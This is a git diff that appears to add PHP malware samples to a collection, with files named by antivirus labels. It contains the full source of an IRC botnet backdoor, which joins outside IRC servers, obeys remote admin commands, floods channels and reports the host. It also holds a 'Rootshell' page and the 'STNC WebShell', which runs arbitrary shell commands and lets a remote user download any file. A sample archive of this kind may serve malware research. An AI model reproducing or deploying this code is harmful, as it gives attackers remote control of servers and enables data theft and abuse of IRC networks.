"; + include ($a.$b.$c); + ?> + diff --git a/PHP/Backdoor.PHP.Agent.dy b/PHP/Backdoor.PHP.Agent.dy new file mode 100644 index 00000000..66a544b5 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.dy @@ -0,0 +1,628 @@ +", +" :P~", +" :D", +",", +".", +"a", +"i", +"u", +"e", +"o", +"z", +"v", +"z", +"x", +"c", +"p", +"m", +"t", +"k", +"b", +"s", +"u", +"bot", +"g", +"lo", +"jo", +"lol" +); +$tsu1=array("`","|","[","]","{","}","^","_"); +$tsu2=array("`","|","[","]","{","}","^","-","\\","_"); +$nicky=array( + "cew_im0ed", + "cew_isepin", + "cew_maud", + "cew_like_ml", + "cew_butuh", + "cew_suka_dorong", + "cew_gerobak", + "cew_soto", + "cew_bakso", + "cew_gado", + "cew_burik", + "cew_panas", + "cew_tempat", + "cew_asbak", + "cew_jual_kambing", + "cew_utis_surya", + "cew_notepad", + "cew_spg_montok_abis", + "cew_diam_saja", + "cew_bantal", + "cew_udunen", + "cew_poraken", + "cew_suka_bawahmu", + "cew_kutilen", + "cew_bokong", + "cew_jujur", + "cew_urat_nadi", + "cew_butuh_kamu", + "cew_tentara", + "cew_monitor", + "cew_dodol_wedus", + "cew_burik_beceng", + "cew_blethang", + "cew_kerbuy", + "cew_brekay", + "cew_lesbong", + "cew_napi", + "cew_wlingi", + "cew_kauman", + "cew_pendaki", + "cew_lesoh", + "cew_cari_co_gede", + "cew_suka_ditimang", + "cew_binasa", + "cew_dandong^fs", + "cew_kepeten", + "cew_bisadiboking", + "cew_jalanjalan", + "cew_tawangmangu", + "cew_suka_kentut", + "cew_duh_burik" + + +); +$usr1=array( +"BLoodroSE", +); + +$nick = $nicky[rand(0,count($nicky) - 1)]; +$awaymsg = "4Ã� ’Ã� ’Æ’Ã� ’¢â‚¬Å¡Ã� ’Ã� ’‚Ã� ’‚»8!4Ã� ’Ã� ’Æ’Ã� ’¢â‚¬Å¡Ã� ’Ã� ’‚Ã� ’‚« 4tawa 8CÃ� ’Ã� ’Æ’Ã� ’¢â‚¬Å¡Ã� ’Ã� ’‚Ã� ’‚®Ã� ’Ã� ’Æ’Ã� ’� ’Ã� ’Ã� ’‚Ã� ’‚«wS 4Ã� ’Ã� ’Æ’Ã� ’¢â‚¬Å¡Ã� ’Ã� ’‚Ã� ’‚»8!4Ã� ’Ã� ’Æ’Ã� ’¢â‚¬Å¡Ã� ’Ã� ’‚Ã� ’‚«"; +$identify = 'serang'; +$Admin = 'paijoe'; +$BOT_PASSWORD = 'serang'; +$channels = '#xirc'; +$remotehst2= array("irc.mojok.org","irc.indoirc.net"); +$remotehost= $remotehst2[rand(0,count($remotehst2) - 1)]; +$port = '6667'; +$realname = '8,1^_1,13B13,1L1,13o13,1o1,13D13,1S8,1_^'; +$counterfp = 0; +$channels = str_replace("CNL","#",$channels); +print ""; +print "== Connecting to $remotehost..."; + + +$raway = "on"; +$log = "off"; +$saway = "1"; +if (!$stime) { $stime = time(); } +if (!$port) { $port = "6666"; } +$Admin = strtolower($Admin); +$auth = array($Admin => array("name" => $Admin, "pass" => $BOT_PASSWORD, "auth" => 1,"status" => "Admin")); + +$username = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)]; +$keluar = 0; +$akill = 1; +$katime = 0; +$localhost = 'localhost'; +$dayload = date("H:i:s d/m/Y"); +ini_set('user_agent','MSIE 5\.5;'); +set_time_limit(0); +define ('CRL', "\r\n"); +$channels = strtolower($channels)." "; +$channel = explode(" ", $channels); + +do { + $fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 30); + if(!$fp) { + if ( $counterfp <= 200 ) { + $counterfp = $counterfp+1; + working($nick); + } + else { + print "
Cannot connect to $remotehost!
Please Try Another Server!
"; + $keluar = 1; + exit; + } + } + print "
== Suceeded connection"; + $Header = 'NICK '.$nick . CRL; + $Header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL; + fputs($fp, $Header); + $response = ''; + while (!feof($fp)) { + $response .= fgets($fp, 1024); + while (substr_count($response,CRL) != 0) { + $offset = strpos($response, CRL); + $data = substr($response,0,$offset); + $response = substr($response,$offset+2); + if (substr($data,0,1) == ':') { + $offsetA = strpos($data, ' '); + $dFrom = substr($data,1,$offsetA-1); + $offsetB = strpos($data, ' :'); + $dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1); + $offsetC = strpos($data, '!'); + $dNick = substr($data,1,$offsetC-1); + $iText = substr($data,$offsetB+2); + if ( substr($dCommand,0,3) == '004' ) { + fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL); + if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); } + fputs($fp, 'NOTICE ' . $Admin . ' :Halo bos besar!' . CRL); + foreach ($channel as $v) { + fputs($fp, 'JOIN ' .$v . CRL); + } + $pong1 = '1'; + } + elseif (substr($dCommand,0,3)=='465') { + print "
== This bot have been autokilled."; + $akill = 2; + } + elseif (substr($dCommand,0,3)=='433') { + $nick = $nicky[rand(0,count($nicky) - 1)]; + fputs($fp, 'NICK '.$nick . CRL); + } + elseif (substr($dCommand,0,3)=='432') { + $nick = $nick.$username; + fputs($fp, 'NICK '.$nick . CRL); + } + if (eregi('.dal.net',$dNick) && $akill==2) { + if (eregi('AKILL ID:',$data) || eregi('Your hostmask is',$data) || eregi('Your IP is',$data)) { + print "
".strstr($data,'***')." "; + + if (eregi('Your IP is',$data)) { + $keluar = 1; + exit; + } + } + } + $dcom = explode(" ", $dCommand); + $dNick = strtolower($dNick); + if ($dcom[0]=='KICK' && $dcom[2]==$nick) { + fputs($fp, 'JOIN ' .$dcom[1]. CRL); + } + elseif ($dcom[0]=='NICK' || $dcom[0]=='QUIT' || $dcom[0]=='PART') { + if ($auth["$dNick"]) { + if ($auth["$dNick"]["pass"]) { + if ($auth["$dNick"]["auth"]==2) { + + if ($dcom[0]=='NICK') { + $com = explode(" ", $data); + $chnick = strtolower(str_replace(':','',$com[2])); + if ($dNick!=$chnick) { + $auth["$dNick"]["auth"] = 1; + fputs($fp,'NOTICE '.$chnick.' :selamat istirahat bos! ' . CRL); + } + } else { $auth["$dNick"]["auth"] = 1; fputs($fp,'NOTICE '.$dNick.' :selamat istirahat bos! ' . CRL); } + } + } else { fputs($fp,'NOTICE ' . $dNick . ' :pass your pass ' . CRL); } + } + } + elseif ($dcom[0]=='307' && strtolower($dcom[2])==$whois) { + $dcom[2] = strtolower($dcom[2]); + if ($auth["$dcom[2]"]) { + if ($auth["$dcom[2]"]["pass"]) { + if ($auth["$dcom[2]"]["auth"]==1) { + $auth["$dcom[2]"]["auth"] = 2; $whois = ""; + fputs($fp,'NOTICE ' . $dcom[2] . ' :You`re Authorized as '.$auth["$dcom[2]"]["status"].' of this bot! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dcom[2] . ' :password bener bos seep! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Pass salah cux! Type: pass To Set Your Own Password then Auth Again ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); } + } + elseif ($dcom[0]=='NOTICE') { + $com = explode(" ", $data); + if ($com[3]==':KB' && $com[4] && $com[5] && $com[6]) { + $msg = str_replace('','',$data); + $msg = strstr($msg,":KB"); + $msg = str_replace(":KB $com[4]","",$msg); + fputs($fp, 'KICK '.$com[4].' '.$com[5].' :'.$msg . CRL); + fputs($fp, 'MODE '.$com[4].' +b *!*'.$com[6] . CRL); + } + } + elseif ($dcom[0]=='PRIVMSG') { + $com = explode(" ", $data); + if ($com[3]==':VERSION') { + fputs($fp,'NOTICE '.$dNick.' :'.chr(1).'VERSION iLhaMiRc ajaH:p'.chr(1) . CRL); + } + elseif ($auth["$dNick"]["status"] && $com[3]==':auth' && $com[4]) { + if ($auth["$dNick"]) { + if ($auth["$dNick"]["pass"]) { + if ($auth["$dNick"]["auth"]==1) { + if ($com[4]===$auth["$dNick"]["pass"]) { + $auth["$dNick"]["auth"] = 2; + fputs($fp,'NOTICE ' . $dNick . ' :You`re Authorized as '.$auth["$dNick"]["status"].' of this bot! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :password salah! Auth salah cok! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :password bener bos! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass To Set Your Own Password then Auth Again ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':deauth') { + if ($auth["$dNick"]) { + if ($auth["$dNick"]["pass"]) { + if ($auth["$dNick"]["auth"]==2) { + $auth["$dNick"]["auth"] = 1; + fputs($fp,'NOTICE ' . $dNick . ' :You`re LogOut! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :You`re Already LogOut! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass To Set Your Own Password then Auth Again ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':pass' && $com[4]) { + if ($auth["$dNick"]) { + if (!$auth["$dNick"]["pass"]) { + $auth["$dNick"]["pass"] = $com[4]; + $auth["$dNick"]["auth"] = 1; + fputs($fp,'NOTICE ' . $dNick . ' :Your Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth To Authorized Imediately! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Already Set! Type: auth To Get Authorized ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':chgpass' && $com[4] && $com[5]) { + if ($auth["$dNick"]) { + if ($auth["$dNick"]["auth"]==2) { + if ($com[4]===$auth["$dNick"]["pass"]) { + $auth["$dNick"]["pass"] = $com[5]; + fputs($fp,'NOTICE ' . $dNick . ' :Your New Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth To Authorized Imediately! ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :Your Old Pass Wrong! Type: chgpass To Change Your Auth Pass ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth To Authorized ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':adduser' && $com[4] && $com[4]!=$nick && $com[5]) { + $com[4] = strtolower($com[4]); + if ($auth["$dNick"]["auth"]==2) { + if ($auth["$dNick"]["status"]=="Admin") { + if ($com[5]=="master" || $com[5]=="user") { + $auth["$com[4]"]["name"] = $com[4]; + $auth["$com[4]"]["status"] = $com[5]; + fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL); + fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass To Set Your Pass ' . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :salah Command! Type: adduser ' . CRL); } + } elseif ($auth["$dNick"]["status"]=="master") { + if (!$auth["$com[4]"]) { + if ($com[5]=="user") { + $auth["$com[4]"]["name"] = $com[4]; + $auth["$com[4]"]["status"] = $com[5]; + fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL); + fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass user ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :User Already Exist! Aborting AddUser! ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth To Authorized ' . CRL); } + } + elseif ($auth["$dNick"]["status"] && $com[3]==':deluser' && $com[4]) { + $com[4] = strtolower($com[4]); + if ($auth["$dNick"]["auth"]==2) { + if ($auth["$dNick"]["status"]=="Admin") { + if ($auth["$com[4]"]["status"]=="master" || $auth["$com[4]"]["status"]=="user") { + unset($auth["$com[4]"]); + fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL); + fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser ' . CRL); } + } elseif ($auth["$dNick"]["status"]=="master") { + if ($auth["$com[4]"]["status"]=="user") { + unset($auth["$com[4]"]); + fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL); + fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL); + } else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser ' . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); } + } else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth To Authorized ' . CRL); } + } + elseif ($auth["$dNick"]["status"]) { + if (ereg(":`",$com[3]) || ereg(":!",$com[3])) { + $chan = strstr($dCommand,"#"); + $anick = str_replace("PRIVMSG ","",$dCommand); + if ($com[3]==':!auth') { + if ($auth["$dNick"]["auth"]==2) { + fputs($fp,'NOTICE '.$dNick.' :You`re already Authorized!' . CRL); + } else { + $whois = $dNick; + fputs($fp,'WHOIS '.$dNick . CRL); + } + } elseif ($com[3]==':`auth' && $chan) { + if ($auth["$dNick"]["auth"]==2) { + fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' siap bos!' . CRL); + } else { fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' bukan bosku cok!' . CRL); } + } elseif ($auth["$dNick"]["auth"]==2) { + if ($com[3]==':`say' && $com[4] && $chan) { + $msg = strstr($data,":`say"); + $msg = str_replace(":`say ","",$msg); + fputs($fp,'PRIVMSG '.$chan.' :'.$msg. CRL); + } + elseif ($com[3]==':`act' && $com[4] && $chan) { + $msg = strstr($data,":`act"); + $msg = str_replace(":`act ","",$msg); + fputs($fp,'PRIVMSG '.$chan.' :ACTION '.$msg.''. CRL); + } + elseif ($com[3]==':`slap' && $com[4] && $chan) { + fputs($fp,'PRIVMSG '.$chan.' :ACTION slaps '.$com[4].' Tepat Di jidat 4pake kursi, kompor, penggorengan, plus tahi kuda... 2JeGuuuERRR... PleeTHaaQQQ ... DeeZZiiNGhHH ... 12cukuliinn dach loe ... monyong² tuh jidat ... hahahahakZ :4P~'. CRL); + } + elseif ($com[3]==':`msg' && $com[4] && $com[5]) { + $msg = strstr($data,":`msg"); + $msg = str_replace(":`msg $com[4] ","",$msg); + fputs($fp,'PRIVMSG '.$com[4].' :'.$msg. CRL); + } + elseif ($com[3]==':`notice' && $com[4] && $com[5]) { + $msg = strstr($data,":`notice"); + $msg = str_replace(":`notice $com[4] ","",$msg); + fputs($fp,'NOTICE '.$com[4].' :'.$msg. CRL); + } + elseif ($com[3]==':`ctcp' && $com[4] && $com[5]) { + $msg = strstr($data,":`ctcp"); + $msg = str_replace(":`ctcp $com[4] ","",$msg); + fputs($fp,'PRIVMSG '.$com[4].' :'.$msg.''. CRL); + } + elseif ($com[3]==':`ping' && $chan) { + $sml = $smile[rand(0,count($smile) - 1)]; + fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', PONG! '.$sml. CRL); + } + elseif ($com[3]==':`pong' && $chan) { + $sml = $smile[rand(0,count($smile) - 1)]; + fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', PING! '.$sml. CRL); + } + elseif ($com[3]==':`info' && $auth["$dNick"]["status"]=="Admin") { + $bhost = $_SERVER['HTTP_HOST']; + $bphp = $_SERVER['PHP_SELF']; + fputs($fp,'NOTICE '.$dNick.' :Bot Host: '.$bhost.', Bot PHP: '.$bphp. CRL); + } + elseif ($com[3]==':`up' && $chan) { + fputs($fp, 'PRIVMSG chanserv@services.dal.net :op '.$chan.' '.$nick . CRL); + } + elseif ($com[3]==':`down' && $chan) { + fputs($fp, 'MODE '.$chan.' +v-o '.$nick.' '.$nick . CRL); + } + elseif ($com[3]==':`tsunami' && $com[4] && $auth["$dNick"]["status"]!="user") { + $nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)]; + fputs($fp, 'NICK '.$nicktsu . CRL); + if (substr($dCommand,0,3)=='433') { + $nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)]; + fputs($fp, 'NICK '.$nicktsu . CRL); + } + $msg = strstr($data,":tsunami"); + $msg = str_replace(":tsunami $com[4]","",$msg); + if (ereg("#", $com[4])) { + fputs($fp, 'JOIN '.$com[4] . CRL); + } + fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'' . CRL); + fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'' . CRL); + fputs($fp, 'PRIVMSG '.$com[4].' :TSUNAMI '.$msg.'' . CRL); + fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'' . CRL); + fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'' . CRL); + + fputs($fp, 'PRIVMSG '.$com[4].' :FLOOD '.$msg.'' . CRL); + if (ereg("#", $com[4])) { + fputs($fp, 'PART '.$com[4].' :Complete' . CRL); + fputs($fp, 'NICK '.$nick . CRL); + } else { + fputs($fp, 'NICK '.$nick . CRL); + } + } + elseif ($com[3]==':`cycle' && $chan && $auth["$dNick"]["status"]!="user") { + $msg = strstr($data,":`cycle"); + if (ereg("#", $com[4])) { + $partchan = $com[4]; + $msg = str_replace(":`cycle $com[4]","",$msg); + } else { + $partchan = $chan; + $msg = str_replace(":`cycle","",$msg); + } + if (strlen($msg)<3) { + $msg = ''; + } + fputs($fp, 'PART '.$partchan.' :'.$msg . CRL); + fputs($fp, 'JOIN '.$partchan . CRL); + } + elseif ($com[3]==':`part' && $auth["$dNick"]["status"]=="Admin") { + $msg = strstr($data,":`part"); + if (ereg("#", $com[4])) { + $partchan = $com[4]; + $msg = str_replace(":`part $com[4]","",$msg); + } else { + $partchan = $chan; + $msg = str_replace(":`part","",$msg); + } + if (strlen($msg)<3) { + $msg = ''; + } + fputs($fp, 'PART '.$partchan.' :'.$msg . CRL); + $remchan = strtolower($partchan); + if (in_array($remchan, $channel)) { + $channels = str_replace("$remchan ","",$channels); + unset($channel); + $channel = explode(" ", $channels); + } + + foreach ($channel as $v) { + fputs($fp, 'JOIN '.$v . CRL); + } + } + elseif ($com[3]==':`join' && $com[4] && $auth["$dNick"]["status"]=="Admin") { + if (!ereg("#",$com[4])) { $com[4]="#".$com[4]; } + $addchan = strtolower($com[4]); + if (!in_array($addchan, $channel)) { + $channel[]=$addchan; + $channels.="$addchan "; + } + foreach ($channel as $v) { + sleep(rand(1,6)); + fputs($fp, 'JOIN '.$v . CRL); + } + } + elseif ($com[3]==':`botnick' && $com[4] && !$chan && $auth["$dNick"]["status"]=="Admin") { + $nick = $com[4]; + $identify = $com[5]; + fputs($fp, 'NICK '.$nick . CRL); + fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL); + } + elseif ($com[3]==':`k' && $com[4] && $chan) { + $msg = strstr($data,":`k"); + $msg = str_replace(":`k $com[4]","",$msg); + fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL); + } + elseif ($com[3]==':`kb' && $com[4] && $chan) { + $msg = strstr($data,":`kb"); + $msg = str_replace(":`kb $com[4]","",$msg); + fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL); + fputs($fp, 'MODE '.$chan.' +b '.$com[4] . CRL); + } + elseif ($com[3]==':`ganti') { + $nick = $nicky[rand(0,count($nicky) - 1)]; + fputs($fp, 'NICK '.$nick . CRL); + if (substr($dCommand,0,3)=='433') { + $nick = $nicky[rand(0,count($nicky) - 1)]; + fputs($fp, 'NICK '.$nick . CRL); + } + } + elseif ($com[3]==':`op' && $chan) { + if ($com[4]) { $opnick = $com[4]; } + else { $opnick = $dNick; } + fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL); + } + elseif ($com[3]==':`deop' && $chan) { + if ($com[4]) { $opnick = $com[4]; } + else { $opnick = $dNick; } + fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL); + } + elseif ($com[3]==':`v' && $chan) { + if ($com[4]) { $vonick = $com[4]; } + else { $vonick = $dNick; } + fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL); + } + elseif ($com[3]==':`dv' && $chan) { + if ($com[4]) { $vonick = $com[4]; } + else { $vonick = $dNick; } + fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL); + } + elseif ($com[3]==':`awaymsg' && $auth["$dNick"]["status"]=="Admin") { + $msg = strstr($data,":`awaymsg"); + $msg = str_replace(":`awaymsg","",$msg); + if (strlen($msg)<3) { + $raway="on"; + fputs($fp,'AWAY : ' . 'AWAY' . CRL); + } else { + $raway="off"; + fputs($fp,'AWAY : ' . $msg . CRL); + } + } + elseif ($com[3]==':`mode' && $com[4] && $chan) { + fputs($fp, 'MODE '.$chan.' :'.$com[4].' '.$com[5] . CRL); + } + elseif ($com[3]==':`nickmode' && $com[4]) { + $nickmode = $com[4]; + fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); + } + elseif ($com[3]==':`chanlist') { + fputs($fp, 'NOTICE '.$dNick.' :Channel List: '.$channels . CRL); + } + elseif ($com[3]==':`userlist') { + $userlist=""; + foreach ($auth as $user) { + if ($user["pass"]) { $pass="-pass ok"; } + else { $pass="-no pass"; } + $userlist .= $user["name"].'('.$user["status"].$pass.') '; + } + fputs($fp, 'NOTICE '.$dNick.' :User List: '.$userlist . CRL); + } + elseif ($com[3]==':`quit' && $auth["$dNick"]["status"]=="Admin") { + $msg = strstr($data,":`quit"); + $msg = str_replace(":`quit","",$msg); + if (strlen($msg)>3) { + $msg = str_replace(" ","_",$msg); + } + $quit1 = array("ngantor","nguantuk","sama","brb","bye_all","s33_you","excess_flood","pingtimeout","hehe","bye","mandi","makan","muuah","quit","conection_reset_bay_peer","banned","part","leaving","ada_deh","call_me","wew","toronto.hub.dal.net_brodway.dal.net","no_komen","restart"); + $quitmsg = $quit1[rand(0,count($quit1) - 1)]; + fputs($fp, 'QUIT ' . $quitmsg . CRL); + $keluar = 1; + exit; + } + elseif ($com[3]==':`vhost' && $auth["$dNick"]["status"]=="Admin") { + if ($com[4]) { $localhost = $com[4]; } + else { $localhost = 'localhost'; } + $keluar = 0; + fputs($fp, 'QUIT ' . CRL); + } + elseif ($com[3]==':`jump' && $auth["$dNick"]["status"]=="Admin") { + if (!eregi(".dal.net",$com[4])) { + $remotehost = "irc.dal.net"; + } else { $remotehost = $com[4]; } + $keluar = 0; + fputs($fp, 'QUIT changging_server' . CRL); + } + elseif ($com[3]==':`ident' && $auth["$dNick"]["status"]=="Admin") { + if (!$com[4]) { + $username = $username; + } else { $username = $com[4]; } + $keluar = 0; + fputs($fp, 'QUIT ganti_ident' . CRL); + } + elseif ($com[3]==':`fullname' && $auth["$dNick"]["status"]=="Admin") { + if (!$com[4]) { + $realname = "--"; + } else { $realname = $com[4]; } + $keluar = 0; + fputs($fp, 'QUIT ganti_fullname' . CRL); + } + elseif ($com[3]==':`topic' && $com[4] && $chan) { + $msg = strstr($data,":`topic"); + $msg = str_replace(":`topic ","",$msg); + fputs($fp, 'TOPIC '.$chan.' :'.$msg . CRL); + } + elseif ($com[3]==':!help' && !$chan) { + fputs($fp,'PRIVMSG '.$dNick.' :Secret Help' . CRL); + } + } else { fputs($fp,'NOTICE '.$dNick.' :Please Auth First! Type: auth To Authorized '. CRL); } + } + } + elseif (!$auth["$dNick"] && !eregi("auth",$iText)) { + if (eregi("www.",$iText) || eregi("http:",$iText) || eregi("join #",$iText)) { + if (!ereg("#",$dCommand)) { + if ($log=="on") { + fputs($fp,'PRIVMSG '. $Admin .' :4inviter: ' . $dFrom . '2:' .$iText. CRL); + } + $inv = strstr($dFrom,'@'); + foreach ($auth as $user) { + if ($user["status"]=="user") { + fputs($fp, 'NOTICE '.$user["name"].' :KB '.$chan.' '.$dNick.' '.$inv.'' . CRL); + } + } + } + } + elseif (!ereg("#",$dCommand)) { + if ($log=="on") { + fputs($fp,'PRIVMSG '.$Admin.' :6' . $dFrom . '12:' .$iText. CRL); + } + } + } + } + } + elseif (substr($data,0,4) == 'PING') { + fputs($fp,'PONG ' . substr($data,5) . CRL); + $smile = $querym[rand(0,count($querym) - 1)]; + $kata1 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)]; + $kata2 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)]; + fputs($fp,'PRIVMSG #whatz :' . $kata1 . ' ' . $kata2 . $smile . CRL); + } + } + } + fclose ($fp); +} while ($keluar==0); +} +working($nick); +?> diff --git a/PHP/Backdoor.PHP.Agent.fo b/PHP/Backdoor.PHP.Agent.fo new file mode 100644 index 00000000..97e257b0 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.fo @@ -0,0 +1,37 @@ + + + + + +
+
 ____             _         ____  _          _ _
+|  _ \ ___   ___ | |_      / ___|| |__   ___| | |
+| |_) / _ \ / _ \| __|     \___ \| '_ \ / _ \ | |
+|  _ < (_) | (_) | |_   _   ___) | | | |  __/ | |
+|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|
+
+
+
+ +
+

+
+
+ + + + +
+

Rootshell v © 2006 by SR-Crew

+
+
diff --git a/PHP/Backdoor.PHP.Small.u b/PHP/Backdoor.PHP.Small.u new file mode 100644 index 00000000..2c318ae5 --- /dev/null +++ b/PHP/Backdoor.PHP.Small.u @@ -0,0 +1,36 @@ +$v) +{ $_POST[$k] = stripslashes($v); } + +/* +$login='root'; +$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty") + +if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash))) +{ +header("HTTP/1.0 401 Unauthorized"); +header("WWW-Authenticate: Basic"); +die(); +} +*/ + +function fe($s) +{return function_exists($s);} +function cmd($s) +{if(fe("exec")){exec($s,$r);$r=join("\n",$r);} +elseif(fe("shell_exec"))$r=shell_exec($s); +elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();} +elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();} +elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);} +else $r=`$s`;return $r;} +function safe_mode_is_on() +{return ini_get('safe_mode');} +function str100($s) +{if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;} +function id() +{return str100(cmd("id"));} +function uname() +{return str100(cmd("uname -a"));} + +function edit($size, $name, $val) +{ return ""; } +function button($capt) +{ return ""; } +function hidden($name, $val) +{ return ""; } +function hidden_pwd() +{ global $location; return hidden("pwd",$location);} + +$action_edit = false; + +$printline = ""; + +if(isset($_POST["action"])) $action = $_POST["action"]; +else $action = "cmd"; + +if(isset($_POST["pwd"])) +{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; } + +$location = getcwd(); + +if(($action === "download")&&(isset($_POST["fname"]))) +{ + $fname = $_POST["fname"]; + if(file_exists($fname)) + { + $pathinfo = pathinfo($fname); + header("Content-Transfer-Encoding: binary"); + header("Content-type: application/x-download"); + header("Content-Length: ".filesize($fname)); + header("Content-Disposition: attachment; filename=".$pathinfo["basename"]); + readfile($fname); + die(); + } + else + $printline = "\"$fname\" - download failed."; +} + +echo " STNC WebShell v$version + + + + + + + + +
  STNC WebShell v$version  id: ".id()."
uname: ".uname()."
